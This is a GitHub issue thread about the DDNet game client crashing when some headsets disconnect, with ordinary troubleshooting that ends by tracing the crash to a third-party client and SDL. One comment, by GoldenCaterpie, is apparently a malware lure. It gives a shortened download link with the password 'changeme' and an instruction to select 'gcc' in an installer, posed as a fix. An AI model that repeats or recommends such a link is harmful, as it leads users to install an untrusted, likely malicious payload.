### ISSUE TITLE
Client crashes when disconnecting some headphones/microphones

### ISSUE THREAD

**Issue by Robyt3** [ddnet/ddnet#8827]
Client crashes relatively consistently when disconnecting the Logitech G432 headset for LePinpin on Discord with version 18.4.

Works correctly for me with Logitech G930.

**Comment by BlaiZephyr** [comment]
doesn't crash for me when:

> removing the Bluetooth adapter during an active connection
> using cable to connect it and disconnecting it

Logitech G733 Wireless tested on DDNet latest and DDNet 18.4

maybe a windows issue?

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Robyt3** [comment]
Seems like it was an issue only in a third-party client and likely fixed by updating SDL.
